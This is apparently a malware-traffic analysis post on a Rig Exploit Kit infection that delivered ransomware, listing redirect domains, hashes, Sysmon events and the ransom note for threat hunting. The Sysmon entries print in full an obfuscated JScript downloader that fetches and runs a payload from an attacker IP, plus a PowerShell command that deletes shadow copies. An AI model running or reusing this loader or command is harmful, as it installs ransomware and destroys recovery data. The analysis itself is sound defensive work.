Rig Exploit Kit delivers Ransomware

I have added a zipped pcap file for your analysis. The password for the zipped pcap is “infected” all lowercase.

PCAP file of the infection traffic:
2020-03-04-Rig-EK-Ransomware-pcap.zip


ASSOCIATED DOMAINS:

174.137.155.139 – clk.rtpdn11.com -vGET /click?i=034AdDm5wWo_0 – REDIRECT
104.31.92.55 Port 443 – www.infiesta.info – REDIRECT
104.27.164.236 Port 443 – skwizyou.xyz – REDIRECT
206.189.156.214 – POST /?Mzk0MzA2&klUjFLy&TXKLZrzF=community&dnLl=accelerator&igbmuNyYP=irreverent&fLP=disagree – RIG EXPLOIT KIT

 

IMAGES:


Shown above: Traffic associated with Rig Exploit Kit delivering ransomware


Shown above: Ransom note left on desktop of infected host

 


Shown above: Sample of encrypted files from ransomware attack

 

SOME ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

[SYSMON EVENT TYPE 1]
Image C:\Windows\System32\cmd.exe
CommandLine cmd.exe /q /c cd /d “%%tmp%%” && echo function O(l){var w=”p”+”ow”,j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+”.”+e+”Request.5.1″);y[“set”+”Proxy”](n);y.open(“GET”,k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e[“cha”+”rCodeAt”](b%%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join(“”)};try{var u=WScript,o=”Object”,A=Math,a=Function(“b”,”return u.Create”+o+”(b)”);P=(“”+u).split(” “)[1],M=”indexOf”,q=a(P+”ing.FileSystem”+o),m=u.Arguments,e=”WinHTTP”,Z=”cmd”,j=a(“W”+P+”.Shell”),s=a(“ADODB.Stream”),x=O(8)+”.”,p=”exe”,n=0,K=u[P+”FullName”],E=”.”+p;s.Type=2;s.Charset=”iso-8859-1″;s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M](“PE\x00\x00″));s.WriteText(v);if(31^<d){var z=1;x+=”dll”}else x+=p;s[“sav”+”etofile”](x,2);s.Close();f=”r”;z^&^&(x=”regsv”+f+32+E+” /s “+x);j.run(Z+E+” /c “+x,0)}catch(x){};q.Deletefile(K);>1.tmp && start wscript //B //E:JScript 1.tmp “vcbdf45” “http://206.189.156.214/?MjM5MjQ1&RULSoTD&f2fs=w3bQMvXcJxbQFYbGMv3DSKNbNkbWHViPxomG9MildZaqZGX_k7TDfF-qoVTcCgWRxfR8e&rFtV=callous&Byt=irreverent&ySZVs=everyone&Mofsmtop=mustard&fhCG=accelerator&dfWjnzQR=electrical&dQGvo=border&UBeJoS=difference&kQssh=difference&sguGYnV=irreverent&Cfbt=callous&t4f4=7ZUOgrpjkSBfw1kydxdA1MX962njkiGnUOcgp6D9ReFMAwT-KKREbc63VrzybckLYsk9w&EQlWYjIbp=filly&hJtMjcyMTcw”
CurrentDirectory C:\Users\Jane\Desktop\
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe” SCODEF:3436 CREDAT:144385 /prefetch:2

[SYSMON EVENT TYPE 1]
Image C:\Windows\System32\wscript.exe
CommandLine wscript //B //E:JScript 1.tmp “vcbdf45” “http://206.189.156.214/?MjM5MjQ1&RULSoTD&f2fs=w3bQMvXcJxbQFYbGMv3DSKNbNkbWHViPxomG9MildZaqZGX_k7TDfF-qoVTcCgWRxfR8e&rFtV=callous&Byt=irreverent&ySZVs=everyone&Mofsmtop=mustard&fhCG=accelerator&dfWjnzQR=electrical&dQGvo=border&UBeJoS=difference&kQssh=difference&sguGYnV=irreverent&Cfbt=callous&t4f4=7ZUOgrpjkSBfw1kydxdA1MX962njkiGnUOcgp6D9ReFMAwT-KKREbc63VrzybckLYsk9w&EQlWYjIbp=filly&hJtMjcyMTcw” “¤”
CurrentDirectory C:\Users\Jane\AppData\Local\Temp\
Hashes MD5=D1AB72DB2BEDD2F255D35DA3DA0D4B16,SHA256=047F3C5A7AB0EA05F35B2CA8037BF62DD4228786D07707064DBD0D46569305D0
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cmd.exe /q /c cd /d “%tmp%” && echo function O(l){var w=”p”+”ow”,j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+”.”+e+”Request.5.1″);y[“set”+”Proxy”](n);y.open(“GET”,k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e[“cha”+”rCodeAt”](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join(“”)};try{var u=WScript,o=”Object”,A=Math,a=Function(“b”,”return u.Create”+o+”(b)”);P=(“”+u).split(” “)[1],M=”indexOf”,q=a(P+”ing.FileSystem”+o),m=u.Arguments,e=”WinHTTP”,Z=”cmd”,j=a(“W”+P+”.Shell”),s=a(“ADODB.Stream”),x=O(8)+”.”,p=”exe”,n=0,K=u[P+”FullName”],E=”.”+p;s.Type=2;s.Charset=”iso-8859-1″;s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M](“PE\x00\x00″));s.WriteText(v);if(31^<d){var z=1;x+=”dll”}else x+=p;s[“sav”+”etofile”](x,2);s.Close();f=”r”;z^&^&(x=”regsv”+f+32+E+” /s “+x);j.run(Z+E+” /c “+x,0)}catch(x){};q.Deletefile(K);>1.tmp && start wscript //B //E:JScript 1.tmp “vcbdf45” “http://206.189.156.214/?MjM5MjQ1&RULSoTD&f2fs=w3bQMvXcJxbQFYbGMv3DSKNbNkbWHViPxomG9MildZaqZGX_k7TDfF-qoVTcCgWRxfR8e&rFtV=callous&Byt=irreverent&ySZVs=everyone&Mofsmtop=mustard&fhCG=accelerator&dfWjnzQR=electrical&dQGvo=border&UBeJoS=difference&kQssh=difference&sguGYnV=irreverent&Cfbt=callous&t4f4=7ZUOgrpjkSBfw1kydxdA1MX962njkiGnUOcgp6D9ReFMAwT-KKREbc63VrzybckLYsk9w&EQlWYjIbp=filly&hJtMjcyMTcw”

[SYSMON EVENT TYPE 1 – RANSOMWARE USING POWERSHELL TO DELETE SHADOWCOPY]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
CurrentDirectory C:\Users\Jane\AppData\Local\Temp\
Hashes MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7
ParentImage C:\Users\Jane\AppData\Local\Temp\rpr1l7q0.exe
ParentCommandLine “C:\Users\Jane\AppData\Local\Temp\rpr1l7q0.exe”

Decoded base64 depicted in red above:
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

 

RANSOM NOTE:

“Sorry, but your files are locked due to a critical error in your system. The extension of your files is now “fezp8n1vm”. If you yourself want to decrypt the files – you will lose them FOREVER.

You have to pay bitcoins to get your file decoder. DO NOT TAKE TIME, you have several days to pay, otherwise the cost of the decoder will double. How to do it is written below.

If you cannot do it yourself, then search the Internet for file recovery services in your country or city.

Go to the page through the browser: http://decryptor.cc/
If your site does not open, then download the TOR browser (https://torproject.org/). If you can’t access the download page of the TOR browser, then download the VPN!
After you install the TOR browser on your computer go to the site: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/”

 

ASSOCIATED HASH:
rpr1l7q0.exe – Payload Delivered By Rig EK
SHA-256: 5837b4ba1fd67f23fe1285f47782f17ecbebba7d9cf43cdf9b4f18dcb38ec6e7
https://www.virustotal.com/gui/file-analysis/ZDhmNmNkOTQ2OGY2MDA3MTdlNTQwZTU4ODczM2Y5ZmM6MTU4MzM3MTA2OA==/detection